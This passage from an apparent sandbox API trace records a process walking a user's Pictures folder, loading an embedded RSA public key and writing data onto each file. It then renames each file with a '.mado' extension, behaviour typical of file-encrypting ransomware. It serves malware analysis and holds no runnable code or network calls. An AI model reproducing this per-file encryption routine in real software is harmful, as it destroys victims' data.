(pszPath="C:\\Users\\") returned="Users\\" [0205.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.900] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.900] PathFindFileNameW (pszPath="") returned="" [0205.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x609b2700, ftCreationTime.dwHighDateTime=0x1d5e34f, ftLastAccessTime.dwLowDateTime=0xb7006bf0, ftLastAccessTime.dwHighDateTime=0x1d5e791, ftLastWriteTime.dwLowDateTime=0xb7006bf0, ftLastWriteTime.dwHighDateTime=0x1d5e791, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.903] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x609b2700, ftCreationTime.dwHighDateTime=0x1d5e34f, ftLastAccessTime.dwLowDateTime=0xb7006bf0, ftLastAccessTime.dwHighDateTime=0x1d5e791, ftLastWriteTime.dwLowDateTime=0xb7006bf0, ftLastWriteTime.dwHighDateTime=0x1d5e791, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.903] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc33a8aa0, ftCreationTime.dwHighDateTime=0x1d5d7af, ftLastAccessTime.dwLowDateTime=0x9c7f8610, ftLastAccessTime.dwHighDateTime=0x1d5e13f, ftLastWriteTime.dwLowDateTime=0x9c7f8610, ftLastWriteTime.dwHighDateTime=0x1d5e13f, nFileSizeHigh=0x0, nFileSizeLow=0x6674, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7 yIM2f8V.bmp", cAlternateFileName="7YIM2F~1.BMP")) returned 1 [0205.903] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\7 yIM2f8V.bmp") returned=".bmp" [0205.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\7 yIM2f8V.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\7 yim2f8v.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.903] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=26228) returned 1 [0205.903] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.905] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x664e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.905] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.907] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x6674, lpOverlapped=0x0) returned 1 [0205.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.907] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.908] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.908] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.908] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.908] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.908] GetLastError () returned 0x0 [0205.908] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.908] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.908] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.909] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.909] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.909] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6674, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.909] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.909] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.909] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.909] CloseHandle (hObject=0x63c) returned 1 [0205.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74b68 [0205.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.910] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\7 yIM2f8V.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\7 yim2f8v.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\7 yIM2f8V.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\7 yim2f8v.bmp.mado")) returned 1 [0205.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.911] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.912] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da90c60, ftCreationTime.dwHighDateTime=0x1d5e01d, ftLastAccessTime.dwLowDateTime=0xa863cb00, ftLastAccessTime.dwHighDateTime=0x1d5e3d1, ftLastWriteTime.dwLowDateTime=0xa863cb00, ftLastWriteTime.dwHighDateTime=0x1d5e3d1, nFileSizeHigh=0x0, nFileSizeLow=0x124aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b5GbIKj2hxwk2k2X5s49.jpg", cAlternateFileName="B5GBIK~1.JPG")) returned 1 [0205.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x32b69d8 [0205.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\b5GbIKj2hxwk2k2X5s49.jpg") returned=".jpg" [0205.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\b5GbIKj2hxwk2k2X5s49.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\b5gbikj2hxwk2k2x5s49.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.913] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=74922) returned 1 [0205.913] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.915] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12484, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.915] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.917] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.917] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x124aa, lpOverlapped=0x0) returned 1 [0205.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.918] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.919] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.919] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.919] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.919] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.919] GetLastError () returned 0x0 [0205.919] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.919] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.919] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.919] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.919] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x124b0) returned 0x3b81690 [0205.920] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66ae0 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb38 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66b28 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb20 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.920] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32feaf0 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79968 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.921] GetCurrentThreadId () returned 0x600 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32fee48 [0205.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.922] GetCurrentThreadId () returned 0x600 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32c64e8 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 